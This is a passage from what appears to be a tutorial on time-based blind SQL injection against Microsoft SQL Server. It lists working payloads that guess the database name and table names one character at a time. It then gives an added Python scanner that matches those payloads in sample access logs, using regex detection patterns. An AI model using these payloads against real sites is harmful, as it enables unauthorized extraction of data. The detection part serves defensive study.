(4) Guess the third character of the current database name - payload4:
?id=1 IF ASCII(SUBSTRING(DB_NAME(),3,1))=100 WAITFOR DELAY '0:0:5'
(5) Guess the fourth character of the current database name - payload5:
?id=1 IF ASCII(SUBSTRING(DB_NAME(),4,1))=108 WAITFOR DELAY '0:0:5'
(6) Guess the number of tables in the current database - payload6:
?id=1 IF (SELECT count(TABLE_NAME) FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_CATALOG='mydb')=4 WAITFOR DELAY '0:0:5'
(7) Guess the length of the first table name in the current database - payload7:
?id=1 IF len((SELECT top 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_CATALOG='mydb'))=3 WAITFOR DELAY '0:0:5'
(8) Guess the first character of the first table name in the current database - payload8:
?id=1 IF SUBSTRING((SELECT top 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_CATALOG='mydb'),1,1)=CHAR(99) WAITFOR DELAY '0:0:5'
# Continuing in the same way, the first table name in the mydb database is found to be cmd
(9) Guess the length of the second table name in the current database - payload9:
?id=1 IF len((SELECT top 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_CATALOG='mydb' and table_name!='cmd'))=8 WAITFOR DELAY '0:0:5'
(10) Guess the first character of the second table name in the current database (exclude the first table, then take top 1 again) - payload10:
?id=1 IF SUBSTRING((SELECT top 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_CATALOG='mydb' and table_name!='cmd'),1,1)=CHAR(116) WAITFOR DELAY '0:0:5'
Get the combined length of all table names in the mydb database in a single query (FOR XML PATH concatenates them into one string) - payload:
?id=1 IF len((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_CATALOG='mydb' FOR XML PATH))=163 WAITFOR DELAY '0:0:5'
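From the defender's side, the payloads above share a small set of markers: a conditional `IF ... WAITFOR DELAY`, `ASCII(SUBSTRING(...))` character oracles, `DB_NAME()`/`INFORMATION_SCHEMA.TABLES` probes and `FOR XML PATH` concatenation, and every true guess costs the server a five-second delay. The following Python is an added example, not code from the original page, that matches those markers against URL-decoded query strings in a few constructed access-log lines (the log layout, hostnames and IPs are assumptions); the per-client hit count is the useful signal, because guessing one character per request produces dozens of flagged requests from the same source.

```python
import re
import urllib.parse
from collections import Counter

# Signatures for MSSQL time-based blind injection, matched on the URL-decoded
# query string (constructed for this example; tune before production use).
SIGNATURES = {
    "waitfor_delay": re.compile(r"\bWAITFOR\s+DELAY\b", re.I),
    "conditional_delay": re.compile(r"\bIF\b.+?=.+?\bWAITFOR\b", re.I | re.S),
    "char_oracle": re.compile(r"\b(ASCII|SUBSTRING)\s*\(", re.I),
    "schema_probe": re.compile(r"\bDB_NAME\s*\(|\bINFORMATION_SCHEMA\.TABLES\b", re.I),
    "xml_concat": re.compile(r"\bFOR\s+XML\s+PATH\b", re.I),
}

# Constructed access-log layout: client, ident, user, [time], "request", status, response ms.
LOG_LINE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "GET (?P<path>\S+) HTTP/[\d.]+" (?P<status>\d{3}) (?P<ms>\d+)$')

def classify_query(query_string):
    """Return the names of the signatures that fire on one raw query string."""
    decoded = urllib.parse.unquote_plus(query_string)
    return [name for name, rx in SIGNATURES.items() if rx.search(decoded)]

def scan_log(lines):
    """Flag log lines whose query string carries blind-SQLi signatures.

    Returns (alerts, per_ip_counts); the response time is kept so an analyst can
    correlate a WAITFOR payload with the ~5 s delay it asks the server for.
    """
    alerts, per_ip = [], Counter()
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue  # skip lines in another format rather than crash
        path = m.group("path")
        query = path.split("?", 1)[1] if "?" in path else ""
        hits = classify_query(query)
        if hits:
            per_ip[m.group("ip")] += 1
            alerts.append({"ip": m.group("ip"), "ms": int(m.group("ms")), "hits": hits})
    return alerts, per_ip

# Constructed sample traffic: one benign request, two probes from the page
# (URL-encoded as a browser or tool would send them), one unrelated request.
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /item.asp?id=1 HTTP/1.1" 200 12',
    '203.0.113.5 - - [10/Oct/2023:13:55:40 +0000] "GET /item.asp?id=1%20IF%20ASCII(SUBSTRING(DB_NAME(),3,1))=100%20WAITFOR%20DELAY%20%270:0:5%27 HTTP/1.1" 200 5014',
    '203.0.113.5 - - [10/Oct/2023:13:55:46 +0000] "GET /item.asp?id=1%20IF%20(SELECT%20count(TABLE_NAME)%20FROM%20INFORMATION_SCHEMA.TABLES%20WHERE%20TABLE_CATALOG=%27mydb%27)=4%20WAITFOR%20DELAY%20%270:0:5%27 HTTP/1.1" 200 5009',
    '198.51.100.7 - - [10/Oct/2023:13:56:01 +0000] "GET /item.asp?id=7&sort=name HTTP/1.1" 200 15',
]
```

`scan_log(SAMPLE_LOG)` flags the two probe lines, both from 203.0.113.5 and both with a response time near the requested 5 s, while the benign requests produce no hits.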